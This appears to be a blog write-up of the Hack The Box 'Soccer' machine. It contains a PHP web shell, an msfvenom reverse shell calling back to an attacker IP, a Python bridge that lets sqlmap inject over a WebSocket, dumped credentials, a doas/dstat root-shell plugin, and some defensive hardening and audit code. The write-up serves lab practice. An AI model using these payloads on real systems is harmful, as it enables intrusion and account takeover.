HTB-Soccer

Soccer

NMAP enumeration

PORT     STATE SERVICE         REASON         VERSION
22/tcp   open  ssh             syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
|   256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIy3gWUPD+EqFcmc0ngWeRLfCr68+uiuM59j9zrtLNRcLJSTJmlHUdcq25/esgeZkyQ0mr2RZ5gozpBd5yzpdzk=
|   256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIJ2Pj1mZ0q8u/E8K49Gezm3jguM3d8VyAYsX0QyaN6H/
80/tcp   open  http            syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
9091/tcp open  xmltec-xmlmail? syn-ack ttl 63
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix:
| HTTP/1.1 400 Bad Request
| Connection: close
| GetRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 139
| Date: Sat, 24 Dec 2022 07:01:03 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot GET /</pre>
| </body>
| </html>
| HTTPOptions, RTSPRequest:
| HTTP/1.1 404 Not Found
| Content-Security-Policy: default-src 'none'
| X-Content-Type-Options: nosniff
| Content-Type: text/html; charset=utf-8
| Content-Length: 143
| Date: Sat, 24 Dec 2022 07:01:03 GMT
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="utf-8">
| <title>Error</title>
| </head>
| <body>
| <pre>Cannot OPTIONS /</pre>
| </body>
|_ </html>

Recon

80/tcp

Visit the site at http://10.10.11.194; the server redirects to soccer.htb, so add the host to /etc/hosts:

    10.10.11.194 soccer.htb

Then visit http://soccer.htb/

  • dirsearch
    Target: http://soccer.htb/

    [02:06:16] Starting:
    [02:06:23] 403 - 564B - /.ht_wsr.txt
    [02:06:23] 403 - 564B - /.htaccess.bak1
    [02:06:23] 403 - 564B - /.htaccess.save
    [02:06:23] 403 - 564B - /.htaccess.sample
    [02:06:23] 403 - 564B - /.htaccess.orig
    [02:06:23] 403 - 564B - /.htaccessOLD2
    [02:06:23] 403 - 564B - /.htaccessBAK
    [02:06:23] 403 - 564B - /.htaccessOLD
    [02:06:23] 403 - 564B - /.htaccess_extra
    [02:06:23] 403 - 564B - /.htaccess_sc
    [02:06:23] 403 - 564B - /.htaccess_orig
    [02:06:23] 403 - 564B - /.html
    [02:06:23] 403 - 564B - /.htm
    [02:06:23] 403 - 564B - /.htpasswd_test
    [02:06:23] 403 - 564B - /.htpasswds
    [02:06:23] 403 - 564B - /.httr-oauth
    [02:06:45] 403 - 564B - /admin/.htaccess
    [02:06:55] 403 - 564B - /administrator/.htaccess
    [02:06:59] 403 - 564B - /app/.htaccess
    [02:07:24] 200 - 7KB - /index.html
Nothing useful came out of that, so try ffuf with a larger wordlist instead:

    ffuf -c -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -X POST -u http://soccer.htb/FUZZ

  • Visit /tiny/

EntryPoint

Using the script at
https://github.com/febinrev/tinyfilemanager-2.4.3-exploit
I found a set of credentials, possibly the defaults?
admin/admin@123
Try logging in.

I originally wanted to try uploading a file,
but it seemed there was no permission.

Later I found that uploading is only permitted inside the uploads folder.
Craft a malicious payload and upload it:

    <?php system($_GET['a']); ?>

Get Shell

The site automatically purges files in uploads.
To avoid that breaking the reverse connection, generate a shell with msfvenom, upload it and execute it:

    msfvenom -p linux/x64/shell_reverse_tcp lhost=10.10.14.8 lport=443 -f elf > mal

Privilege escalation

  • netstat -antp

    tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:3000          0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:9091            0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
    tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
    tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1093/nginx: worker
    tcp        0     15 10.10.11.194:47840      10.10.14.8:443          ESTABLISHED 2311/sh
    tcp        0      0 127.0.0.1:3306          127.0.0.1:41290         ESTABLISHED -
    tcp        0      0 127.0.0.1:41290         127.0.0.1:3306          ESTABLISHED -
    tcp        0      0 10.10.11.194:9091       10.10.14.8:42182        ESTABLISHED -
    tcp6       0      0 :::22                   :::*                    LISTEN      -
    tcp6       0      0 :::80                   :::*                    LISTEN      1093/nginx: worker
  • Try reaching port 3000 (bound to 127.0.0.1 only, so tunnel it with chisel)

    # kali
    ./chisel_1.7.7_linux_amd64 server -p 8000 -reverse

    # victim
    ./chisel_1.7.7_linux_amd64 client 10.10.14.8:8000 R:socks

After setting up the proxy and visiting it,
we get a page that looks almost the same,
but with login and registration functions.

Registering and logging in redirects to /check.

Inspecting the input box shows it sends a GET request with an id parameter, so it looks like we can pass data through id.
Entering it directly in the URL, however, gets no response.

Inspecting the page source shows the parameter is sent out as a WebSocket (ws) request that verifies whether the ticket is valid.

sqlmap cannot inject directly over the ws protocol,
so following this article, build a middleware server that bridges HTTP to the WebSocket:
https://rayhan0x01.github.io/ctf/2021/04/02/blind-sqli-over-websocket-automation.html

Note: the soc-player subdomain has to be added to /etc/hosts first.
  • ws_sqli.py

    from http.server import SimpleHTTPRequestHandler
    from socketserver import TCPServer
    from urllib.parse import unquote, urlparse
    from websocket import create_connection   # pip install websocket-client

    ws_server = "ws://soc-player.soccer.htb:9091/ws"

    def send_ws(payload):
        """Forward one payload to the WebSocket endpoint and return its reply."""
        ws = create_connection(ws_server)
        # If the server returns a response on connect, use below line
        #resp = ws.recv() # If server returns something like a token on connect you can find and extract from here

        # For our case, format the payload in JSON
        message = unquote(payload).replace('"','\'') # replacing " with ' to avoid breaking JSON structure
        data = '{"id":"%s"}' % message

        ws.send(data)
        resp = ws.recv()
        ws.close()

        if resp:
            return resp
        else:
            return ''

    def middleware_server(host_port,content_type="text/plain"):
        """Tiny HTTP server: ?id=<payload> in, WebSocket reply out, so sqlmap can drive it."""

        class CustomHandler(SimpleHTTPRequestHandler):
            def do_GET(self) -> None:
                self.send_response(200)
                try:
                    payload = urlparse(self.path).query.split('=',1)[1]
                except IndexError:
                    payload = False

                if payload:
                    content = send_ws(payload)
                else:
                    content = 'No parameters specified!'

                self.send_header("Content-type", content_type)
                self.end_headers()
                self.wfile.write(content.encode())
                return

        class _TCPServer(TCPServer):
            allow_reuse_address = True

        httpd = _TCPServer(host_port, CustomHandler)
        httpd.serve_forever()


    print("[+] Starting MiddleWare Server")
    print("[+] Send payloads in http://localhost:8081/?id=*")

    try:
        middleware_server(('0.0.0.0',8081))
    except KeyboardInterrupt:
        pass
  • Once it is running, payloads can be sent to http://localhost:8081/?id=*
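The root cause on the server side is that the id from the {"id": "..."} WebSocket frame reaches the SQL text unchanged. As an added illustration (not code from the box or from this write-up), here is that vulnerable pattern next to a hardened ticket check; the accounts table, its rows and the response values are constructed assumptions, and the probe is the classic boolean test sqlmap's blind mode starts from.

```python
import json
import re
import sqlite3

# Constructed stand-in for the ticket lookup behind /check; table, column
# names and rows are assumptions for this example, not the box's real schema.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE accounts (id INTEGER PRIMARY KEY, username TEXT)")
    db.executemany("INSERT INTO accounts VALUES (?, ?)",
                   [(1234, "player"), (5678, "other")])
    return db

def check_ticket_vulnerable(db, raw_message):
    """The pattern the middleware above exploits: the id string from the
    WebSocket JSON is concatenated straight into the SQL text."""
    ticket = json.loads(raw_message)["id"]
    row = db.execute(
        f"SELECT username FROM accounts WHERE id = '{ticket}'").fetchone()
    return row is not None

def check_ticket_hardened(db, raw_message):
    """Hardened form: reject malformed frames, allow-list the id, and bind it
    as a parameter so it can never change the query structure."""
    try:
        msg = json.loads(raw_message)
    except json.JSONDecodeError:
        return None          # malformed frame: caller should drop the socket
    ticket = msg.get("id") if isinstance(msg, dict) else None
    # A ticket id is a short ASCII digit string; anything else never reaches SQL
    if not isinstance(ticket, str) or not re.fullmatch(r"[0-9]{1,10}", ticket):
        return False
    row = db.execute("SELECT username FROM accounts WHERE id = ?",
                     (int(ticket),)).fetchone()
    return row is not None

if __name__ == "__main__":
    db = make_db()
    # The middleware rewrites " to ' before sending, so payloads carry single quotes
    probe = '{"id": "0\' OR \'1\'=\'1"}'
    print("vulnerable:", check_ticket_vulnerable(db, probe))   # True: the oracle leaks
    print("hardened:  ", check_ticket_hardened(db, probe))     # False: rejected before SQL
```

The boolean difference between the two functions is exactly the oracle that the blind injection above relies on; with the parameterised query there is no input that changes the result other than a real ticket id.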

sqlmap

    sqlmap -u "http://localhost:8081/?id=1" --dbs --batch

  • Dump the password

    player / PlayerOftheMatch2022

SSH login

Log in as player with the credentials just obtained.

SUID enumeration

find / -perm -u=s 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign

Privilege escalation via doas

First look for its configuration file. Trying /etc/doas.conf at first didn't work,
so search for it with find:

    find / -iname "doas.conf" 2>/dev/null
    /usr/local/etc/doas.conf

  • dstat with doas

    Checking the dstat man page shows
    that it can run external script plugins.

    Since /usr/share/dstat is not writable,
    use /usr/local/share/dstat/ instead.

  • dstat_priv.py

    import subprocess

    # dstat imports every plugin it loads, so this module body runs as the
    # user running dstat (root via doas) and simply hands that user a shell
    subprocess.run(["bash"])

  • Run dstat via doas with the plugin attached

    doas /usr/bin/dstat --priv
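The escalation works because a directory on dstat's plugin search path is writable by an unprivileged user while doas lets that user run dstat as root. The following audit, an added example rather than anything from the box or the write-up, checks the two plugin directories named above for that condition; the unsafe_reason rules and the handling of a not-yet-created directory (judged by the nearest existing ancestor, since whoever can write there can create it) are my own assumptions about what a reviewer would want flagged.

```python
import stat
from pathlib import Path

# Plugin directories the write-up shows dstat loading from. The dstat man page
# also lists ~/.dstat/ and the current directory, another reason not to run it
# privileged from an untrusted working directory.
DSTAT_PLUGIN_DIRS = ["/usr/share/dstat/", "/usr/local/share/dstat/"]

def unsafe_reason(mode, uid, gid):
    """Why a directory on a root-run tool's plugin path is unsafe, or None.
    Takes st_mode/st_uid/st_gid so the policy is testable without real dirs."""
    if uid != 0:
        return f"owned by uid {uid}, not root"
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP and gid != 0:
        return f"writable by gid {gid}"
    return None

def nearest_existing(path):
    """A missing plugin dir is only as safe as its first existing ancestor."""
    p = Path(path)
    while not p.exists():
        p = p.parent
    return p

def audit_plugin_dirs(dirs=DSTAT_PLUGIN_DIRS):
    """Map each risky plugin directory to the reason it is risky."""
    findings = {}
    for d in dirs:
        target = nearest_existing(d)
        st = target.stat()
        reason = unsafe_reason(st.st_mode, st.st_uid, st.st_gid)
        if reason:
            if target != Path(d):
                reason = f"missing; would be created under {target}, which is {reason}"
            findings[d] = reason
    return findings

if __name__ == "__main__":
    for d, why in audit_plugin_dirs().items():
        print(f"[!] {d}: {why}")
```

Run it as the doas-permitted user on the host; any line it prints is a path from which a plugin would be loaded as root.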

FLAG

  • user

    35907f92e87694451271ef44e476bcb8

  • root

    8a8620bfc3502b614ccb3aa46ff7de90


https://luoming1995125.github.io/2023/01/21/HTB-Soccer/
Author: Peter Luo
Published: January 21, 2023